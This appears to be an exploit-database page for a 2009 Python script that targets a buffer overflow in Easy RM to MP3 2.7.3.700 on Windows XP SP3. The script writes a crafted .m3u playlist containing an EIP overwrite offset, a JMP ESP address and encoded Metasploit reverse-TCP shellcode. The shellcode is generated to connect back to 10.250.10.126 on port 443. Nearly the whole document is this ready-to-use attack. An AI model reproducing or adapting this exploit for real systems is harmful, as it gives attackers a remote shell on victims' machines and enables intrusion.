Easy RM to MP3 2.7.3.700 BoF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy RM to MP3 2.7.3.700 BoF Exploit
# Published : 2009-12-23
# Author : Ron Henry
# Previous Title : Easy RM to MP3 27.3.700 local BOF xp sp2
# Next Title : CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit

#!/usr/bin/python

# Exploit for against Easy RM to MP3 2.7.3.700
# 12.2.2009
# Author: Ron Henry - rlh@ciphermonk.net - dijital1
# Version: Easy RM to MP3 2.7.3.700
# Tested against WinXP SP3 - English

outputfile = "astley.m3u"

shellcode="A" * 26071 #Offset to EIP - Windows XP SP3
shellcode+="x25x96xa0x7c" # JMP ESP - SHELL32.dll WinXP SP3 0x7CA09625
shellcode+="CAFE" * 8  # 32 Byte NOP Sled
#msfpayload windows/shell_reverse_tcp LHOST=10.250.10.126 LPORT=443 R | msfencode -e x86/alpha_upper -t c
shellcode+=("x89xe7xdaxdexd9x77xf4x5bx53x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4ax48x4cx49x45x50"
"x43x30x45x50x43x50x4dx59x4ax45x50x31x48x52x43"
"x54x4cx4bx51x42x46x50x4cx4bx51x42x44x4cx4cx4b"
"x46x32x45x44x4cx4bx43x42x46x48x44x4fx4fx47x51"
"x5ax47x56x50x31x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x45x31x43x4cx44x42x46x4cx51x30x4fx31x48x4fx44"
"x4dx45x51x4fx37x4bx52x4cx30x50x52x50x57x4cx4b"
"x51x42x44x50x4cx4bx47x32x47x4cx45x51x48x50x4c"
"x4bx51x50x42x58x4bx35x4fx30x43x44x51x5ax43x31"
"x4ex30x50x50x4cx4bx51x58x44x58x4cx4bx50x58x47"
"x50x43x31x4ex33x4dx33x47x4cx47x39x4cx4bx46x54"
"x4cx4bx43x31x4ex36x46x51x4bx4fx50x31x4fx30x4e"
"x4cx49x51x48x4fx44x4dx45x51x49x57x50x38x4dx30"
"x43x45x4cx34x43x33x43x4dx4ax58x47x4bx43x4dx51"
"x34x44x35x4ax42x46x38x4cx4bx51x48x46x44x45x51"
"x4ex33x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx45x51x49x43x4cx4bx44x44x4cx4bx45x51x4ex30"
"x4dx59x50x44x51x34x46x44x51x4bx51x4bx45x31x46"
"x39x51x4ax46x31x4bx4fx4dx30x46x38x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4cx46x51x4dx43x58x47x43x50"
"x32x43x30x45x50x43x58x44x37x44x33x50x32x51x4f"
"x51x44x42x48x50x4cx44x37x47x56x44x47x4bx4fx48"
"x55x4fx48x4ax30x45x51x45x50x43x30x46x49x48x44"
"x51x44x46x30x43x58x51x39x4dx50x42x4bx43x30x4b"
"x4fx49x45x50x50x46x30x46x30x46x30x51x50x46x30"
"x51x50x46x30x42x48x4bx5ax44x4fx49x4fx4bx50x4b"
"x4fx49x45x4bx39x4fx37x45x38x44x4ax4ax5ax45x5a"
"x43x4ex42x48x45x52x43x30x43x31x4fx4bx4dx59x4d"
"x36x43x5ax44x50x51x46x50x57x45x38x4cx59x4ex45"
"x43x44x43x51x4bx4fx49x45x45x38x45x33x42x4dx45"
"x34x45x50x4bx39x4ax43x51x47x51x47x46x37x50x31"
"x4bx46x43x5ax45x42x50x59x51x46x4dx32x4bx4dx45"
"x36x49x57x51x54x46x44x47x4cx43x31x43x31x4cx4d"
"x51x54x46x44x44x50x49x56x43x30x47x34x51x44x46"
"x30x46x36x46x36x51x46x47x36x51x46x50x4ex50x56"
"x51x46x50x53x50x56x42x48x43x49x48x4cx47x4fx4c"
"x46x4bx4fx49x45x4bx39x4bx50x50x4ex51x46x50x46"
"x4bx4fx46x50x45x38x44x48x4bx37x45x4dx43x50x4b"
"x4fx48x55x4fx4bx4cx30x4ex55x4ex42x50x56x45x38"
"x49x36x4cx55x4fx4dx4dx4dx4bx4fx4ex35x47x4cx44"
"x46x43x4cx45x5ax4dx50x4bx4bx4bx50x44x35x44x45"
"x4fx4bx51x57x44x53x42x52x42x4fx43x5ax43x30x46"
"x33x4bx4fx48x55x44x4ax41x41")

FILE = open(outputfile, "w")
FILE.write(shellcode)
FILE.close()